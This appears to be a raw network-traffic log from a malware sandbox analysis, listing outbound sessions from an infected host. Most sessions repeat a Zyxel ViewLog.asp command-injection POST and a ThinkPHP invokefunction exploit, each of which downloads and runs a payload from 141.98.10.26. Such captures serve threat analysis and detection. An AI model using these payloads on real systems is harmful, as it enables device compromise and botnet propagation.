65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-inter

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.23	59468	94.120.163.64	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.643732071 CET	3029	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.23	57546	94.130.0.90	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:14.676225901 CET	3030	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.865123034 CET	3033	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Wed, 22 Nov 2023 07:38:14 GMT Content-Type: text/html Content-Length: 138 Connection: close Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.23	53890	88.221.192.48	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:15.210865974 CET	3057	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.23	59230	112.166.156.134	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:15.705178022 CET	3096	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.23	58622	112.126.240.209	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:15.728900909 CET	3097	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:16.048903942 CET	3159	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:19 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.23	45408	112.126.172.75	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:16.035262108 CET	3159	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:16.341332912 CET	3201	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:34 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.23	38166	95.214.146.184	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.086961031 CET	3274	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.23	45040	94.121.31.100	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.119990110 CET	3276	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.23	41308	94.123.248.145	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.123795986 CET	3277	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.23	58684	62.29.37.123	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.127715111 CET	3277	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.23	48442	85.143.70.151	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.152530909 CET	3278	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.23	51666	31.208.200.2	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.174614906 CET	3288	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.464941025 CET	3388	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Wed, 22 Nov 2023 07:38:15 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.23	54064	31.136.145.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.281025887 CET	3350	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.840070963 CET	3404	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:18.959872007 CET	3456	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.199551105 CET	3786	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:25.807073116 CET	4295	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:34.765645981 CET	5438	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.195055008 CET	7670	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.057871103 CET	12162	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.23	42900	31.136.132.204	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:17.281081915 CET	3350	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.840070963 CET	3403	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:18.959872007 CET	3456	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.199551105 CET	3786	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
